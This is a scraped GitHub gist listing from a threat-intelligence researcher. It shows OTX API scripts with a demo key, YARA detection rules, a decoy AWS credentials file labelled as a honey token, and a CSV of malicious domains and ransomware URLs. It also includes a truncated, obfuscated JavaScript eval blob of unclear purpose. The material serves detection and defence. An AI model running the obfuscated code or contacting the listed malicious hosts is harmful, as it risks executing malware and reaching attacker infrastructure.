chrisdoman
chrisdoman
/ Create Pulse
Created
November 7, 2017 11:09
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from OTXv2 import OTXv2 | |
| # API key for the user api_example | |
| # Pulses will appear at https://otx.alienvault.com/user/api_example/pulses | |
| otx = OTXv2("766ba1df3ab54db9c0fcbf62ef048c3a04c260e8ca65b6c25346084b7b4719ad") | |
| name = 'Test Pulse' | |
| indicators = [ | |
| {'indicator': '69.73.130.198', 'type': 'IPv4'}, | |
| {'indicator': 'aoldaily.com', 'type': 'Domain'} | |
| ] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Script to enumerate bit.ly data - suffers from strict rate limits | |
| import requests, base62 | |
| #start = "1dstjX5" | |
| start = 93340621247 | |
| def getUrl(url): | |
| try: | |
| r = requests.get(url) |
chrisdoman
/ openioc2csv.py
Created
March 26, 2018 14:12
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Script to convert openioc to csv | |
| # Forked from PyMisp | |
| # -*- coding: utf-8 -*- | |
| import os | |
| try: | |
| from bs4 import BeautifulSoup | |
| has_bs4 = True | |
| except ImportError: |
chrisdoman
/ getReports.py
Last active
August 6, 2018 14:46
Quick example to pull reports from OTX with tagged Adversaries (i.e. probably APT)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ''' | |
| Quick example to pull reports with tagged Adversaries (i.e. probably APT) | |
| ''' | |
| from OTXv2 import OTXv2, IndicatorTypes | |
| # This is the API key for the user "api_example" | |
| otx = OTXv2('766ba1df3ab54db9c0fcbf62ef048c3a04c260e8ca65b6c25346084b7b4719ad') | |
| pulses = otx.getall() |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Yara rules to identify malware families, made by Yabin | |
| Auto-generated - plenty of these rules won't work as they rely on looking for compiled code | |
| */ | |
| rule BackdoorAndroidOSCoca_51dc097980b46d053085ff079b153f107d866a27dc19670b79928ec55ab336d7 { | |
| strings: | |
| $a_2 = { 558bebdcdb73a5fdef349bc5b2931e67 } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var _a="(,& vXh)C;sf<H8O1J|iRY9dj?G%m4}n_M'pQZkFyaEP=Ko2/\\x]!cquSV.57B^lW*Utr{z+N-ADg>[we0b\"I6:TL3",_b="^JL,qMP(*IjReDE<xiQYo{tp>8!-[W&hOcbv12Fn\".%4Ks=5 Z]Cl'uXfAHrdGaN/9}zg\\+U6|kSV:;wmyB7T)_03?",_c="DjOx.}S=Q's_\"I:]c[E(g/JG)k!2yY,zBV4>PFu9rp;N1i<%ZUM*?0K5^nX 8td{LAmH6hbolv&\\a7-ReCq|fw+3TW";eval(function(_,b,a,c,n,r){if(n=function(_){return(_<62?"":n(parseInt(_/62)))+((_%=62)>35?String[_a[11]+_c[40]+_b[20]+_c[66]+_b[51]+_a[6]+_b[62]+_c[40]+_b[51]+_b[20]+_c[62]+_b[12]](_+29):_[_c[61]+_c[71]+_a[56]+_c[61]+_a[68]+_a[19]+_c[57]+_b[68]](36))},0==_a[81][_a[68]+_b[12]+_b[23]+_b[52]+_b[62]+_a[53]+_c[80]](0,n)){for(;a--;)r[n(a)]=c[a];c=[function(_){return r[_]||_}],n=function(){return _c[17]+_c[27]+_b[27]+_a[22]+_a[82]+_b[33]+_c[80]+_a[73]+_a[10]+_a[55]+_c[78]+_a[70]+_a[74]+_c[78]+_a[37]+_c[15]},a=1}for(;a--;)c[a]&&(_=_[_c[40]+_a[80]+_b[23]+_b[52]+_b[62]+_a[53]+_b[12]](new RegExp(_a[49]+_a[82]+n(a)+(_b[69]+_a[82]),_a[76]),c[a]));return _}(_c[27]+_c[59]+_b[84]+_c[65]+_b[75]+_a[45]+_b[9]+_c[0]+_a[44]+_a[89]+_b[88] |
chrisdoman
/ cannon.rule
Created
September 2, 2019 17:32
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rule hunt_great_cannon { | |
| strings: | |
| $ = "requesttime_list" nocase wide ascii | |
| $ = "responsetime_list" nocase wide ascii | |
| $ = "cloudflare_js_validate_url" nocase wide ascii | |
| $ = "116.255.226.154" nocase wide ascii | |
| $ = "responsetime-requesttime>TIMEGAP" nocase wide ascii | |
| condition: | |
| any of them | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Short demonstration script to write OTX hostnames to a RPZ format text-file | |
| from OTXv2 import OTXv2 | |
| import os | |
| # This is the API key for the user "api_example" | |
| otx = OTXv2('766ba1df3ab54db9c0fcbf62ef048c3a04c260e8ca65b6c25346084b7b4719ad') | |
| events = otx.get_all_indicators(author_name='alienvault') | |
| output = '' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [default] | |
| aws_access_key_id = AKIAXYZDQCENYTNALZP5 | |
| aws_secret_access_key = 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 | |
| output = json | |
| region = us-east-2 | |
| * This is just a honey token to detect automated scanners looking for AWS keys - this is not a real AWS account! * |
We can't make this file beautiful and searchable because it's too large.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| indicator,indicator_type,pulse_title,pulse_author,tlp | |
| ihracat.myq-see.com,hostname,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white | |
| phantom101.duckdns.org,hostname,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white | |
| goodattack.duckdns.org,hostname,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white | |
| http://www.tempinfo.96.lt/wras/savekey.php,url,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white | |
| http://www.tempinfo.96.lt/wras/createkeys.php,url,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white | |
| http://www.tempinfo.96.lt/wras/RANSOM20.jpg,url,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white | |
| www.tempinfo.96.lt,hostname,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white | |
| 2779863a173ff975148cb3156ee593cb5719a0ab238ea7c9e0b0ca3b5a4a9326,file,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white | |
| 62d38f19e67013ce7b2a84cb17362c77e2 |
OlderNewer